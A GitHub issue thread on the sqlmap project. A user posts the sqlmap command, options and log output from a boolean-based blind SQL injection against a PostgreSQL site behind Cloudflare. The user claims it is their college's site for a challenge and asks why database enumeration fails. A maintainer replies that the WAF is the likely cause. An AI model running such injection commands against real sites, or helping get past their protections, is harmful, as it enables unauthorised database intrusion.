unable to retrieve the database names #4375

Closed
qonsol-ctl opened this issue Oct 11, 2020 · 2 comments

@qonsol-ctl

Describe the bug
I'm trying to exploit a URL and I've done almost everything possible (at least that I know of) but no luck .. sqlmap seems unable to get the database name because of something I don't know

To Reproduce

C:\sqlmap>sqlmap.py -r r.txt --dbs --risk 3 --level 5 --random-agent --dbms PostgreSQL -t traffic.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.9.22#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:56:45 /2020-10-11/

[16:56:45] [INFO] parsing HTTP request from 'r.txt'
[16:56:46] [INFO] setting file for logging HTTP traffic
[16:56:46] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1' from file 'C:\sqlmap\data\txt\user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

Cookie parameter 'CFTOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

[16:56:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: http://host/fragentid=717 OR NOT 2028=2028-- gGzU111111

[16:56:51] [INFO] testing PostgreSQL
[16:56:51] [INFO] confirming PostgreSQL
[16:56:51] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[16:56:51] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[16:56:51] [INFO] fetching database (schema) names
[16:56:51] [INFO] fetching number of databases
[16:56:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:56:51] [INFO] retrieved:
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n]

[16:56:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:56:54] [ERROR] unable to retrieve the number of databases
[16:56:54] [INFO] falling back to current database
[16:56:54] [INFO] fetching current database
[16:56:54] [INFO] retrieved:
[16:57:11] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[16:57:11] [CRITICAL] unable to retrieve the database nam

Expected behavior
get the database name (100% there is an injection and i get bypassed the waf )

Running environment:

  • sqlmap version up to date
  • Installation method ZIP
  • Operating system: Microsoft Windows 10
  • Python version 3.5

Target details:

  • DBMS Postgresql
  • SQLi techniques found by sqlmap boolean-based blind
  • WAF/IPS cloudflare

Additional context
I am scanning my college website for a challenge award and am almost there, except this error occurred

@stamparm
Member

100% there is an injection and i get bypassed the waf - so you know what's the issue here. You have WAF in between. That would explain that OR boolean-based blind instead of some more common payload.

Please assess your target manually

@qonsol-ctl
Author

Thanks a lot, sir .. I appreciate your reply on such short notice .. though I tried manual injection but no luck with the HTTP error (500)
Thanks again
